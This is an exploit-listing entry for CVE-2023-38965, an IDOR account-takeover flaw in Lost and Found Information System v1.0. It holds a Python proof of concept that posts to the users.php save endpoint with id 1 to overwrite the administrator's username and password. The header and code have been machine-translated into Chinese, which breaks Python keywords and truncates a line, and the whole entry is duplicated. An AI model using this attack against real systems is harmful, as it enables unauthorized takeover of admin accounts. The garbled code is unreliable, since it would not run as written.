#利用title:丢失并找到信息系统v1.0 -didor导致帐户接管
#日期: 2023-12-03
#利用作者: OR4NG.M4N
#类别: WebApps
#CVE : CVE-2023-38965
Python P0C :
导入argparse
导入请求
进口时间
parser=argparse.argumentparser(description='将邮政请求发送到目标服务器')
parser.add_argument(' - url',help='target'url',必需=true)
parser.add_argument(' - 用户',help='username',必需=true)
parser.add_argument(' - 密码',help='密码',必需=true)
args=parser.parse_args()
url=args.url +'/classes/users.php?f=save'
数据={
'id':'1',
'firstName':'or4ng',
'middlename':'',
'lastname':'admin',
'username': args.user,
'password': args.password
}
响应=requests.post(url,数据)
如果b'1'响应.content:
打印('exploit .')
时间。
打印('用户:' + args.user +'\ npassword :' + args.password)
其他:
打印('漏洞失败.')
#日期: 2023-12-03
#利用作者: OR4NG.M4N
#类别: WebApps
#CVE : CVE-2023-38965
Python P0C :
导入argparse
导入请求
进口时间
parser=argparse.argumentparser(description='将邮政请求发送到目标服务器')
parser.add_argument(' - url',help='target'url',必需=true)
parser.add_argument(' - 用户',help='username',必需=true)
parser.add_argument(' - 密码',help='密码',必需=true)
args=parser.parse_args()
url=args.url +'/classes/users.php?f=save'
数据={
'id':'1',
'firstName':'or4ng',
'middlename':'',
'lastname':'admin',
'username': args.user,
'password': args.password
}
响应=requests.post(url,数据)
如果b'1'响应.content:
打印('exploit .')
时间。
打印('用户:' + args.user +'\ npassword :' + args.password)
其他:
打印('漏洞失败.')